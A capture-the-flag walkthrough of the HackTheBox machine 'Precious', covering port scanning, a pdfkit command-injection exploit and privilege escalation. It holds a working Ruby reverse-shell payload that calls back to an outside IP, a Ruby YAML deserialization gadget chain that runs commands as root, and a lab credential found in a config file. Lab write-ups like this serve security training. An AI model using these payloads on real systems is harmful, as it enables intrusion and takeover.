Recon

  • Host name

    • http://precious.htb
    • sudo echo "10.10.11.189 precious.htb" >> /etc/hosts
  • Rustscan rustscan -a 10.10.11.189

Open 10.10.11.189:22
Open 10.10.11.189:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:48 EST
Initiating Ping Scan at 13:48
Scanning 10.10.11.189 [2 ports]
Completed Ping Scan at 13:48, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:48
Completed Parallel DNS resolution of 1 host. at 13:48, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:48
Scanning 10.10.11.189 [2 ports]
Discovered open port 22/tcp on 10.10.11.189
Discovered open port 80/tcp on 10.10.11.189
Completed Connect Scan at 13:48, 0.33s elapsed (2 total ports)
Nmap scan report for 10.10.11.189
Host is up, received syn-ack (0.48s latency).
Scanned at 2022-12-17 13:48:42 EST for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

  • Directory Brute force ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://precious.htb/FUZZ
none
  • VHOSTS gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u precious.htb
none

Next Step


Since I did not find any subdomains or other web pages on the web server I decide to look at the main page to see if I could find a vulnerability. I began by spinning up a PHP web server using the php -S 0.0.0.0:80 command. I then create a simple HTML page that had some text and converted it to a PDF using the online PDF converter on http://precious.htb. Once I had a PDF that the web server made I used the exiftool ngveoebbpujxmgb2pxfbmu5p3cr7ddg3.pdf command to see what generated the PDF document.

ExifTool Version Number         : 12.52
File Name                       : ngveoebbpujxmgb2pxfbmu5p3cr7ddg3.pdf
Directory                       : .
File Size                       : 4.6 kB
File Modification Date/Time     : 2022:12:18 17:56:17-05:00
File Access Date/Time           : 2022:12:18 17:56:17-05:00
File Inode Change Date/Time     : 2022:12:18 17:56:18-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

Once I saw that the PDF file was created by pdfkit v0.8.6 I new that I could research and see if their were any CVE for this particular PDF generator. After a quick search I found an GitHub Repository that talked about this CVE. The GitHub repository had a payload that could simply be pasted in to the form on the target web page and it would create an reverse shell on the target server, all I had to do was replace their IP Address with my IP Address and start pwncat

Payload = http://10.10.14.148/?name=%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.148",4444))'`

pwncat -l 4444 --self-inject /bin/bash:10.10.14.148:4445

I then had a reverse shell on the target system.


Privilege Escalation


The first thing I did in this machine was to start going though the folders in the ruby users home directory. After looking through all of the directory I found a file called config in the .bundle directory. The config file contained the following password and username henry:Q3c1AqGHtoI0aXAYFH. With this username and password I ssh in to the precious.htb machine. Since is was elevated to the henry user I got the user flag by running cat /home/henry/user.txt command.

Now that I had escalated my privileges to the henry user I ran the sudo -l command and saw that this use could only run the /opt/update_dependencies.rb script. Once I had discovered the this file I decided to see what it contained. After looking through the source code for this scripted I saw that it imported a yaml library to parse a yaml file. Armed with this information I looked up vulnerabilities that effect yaml parser and discovered a yaml deserialization vulnerability in the ruby yaml library.

Yaml POC

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: PLACE_CMD_HERE
         method_id: :resolve

When you put this in side the yaml file that the ruby script opens it will cause what ever command that is were the PLACE_CMD_HERE text is will run as root. Taking this information I put /bin/bash as the command to run which when I called the ruby script as root it dropped me in to an interactive bash terminal. Now that I was root I ran the cat /root/root.txt command to get the root.txt flag.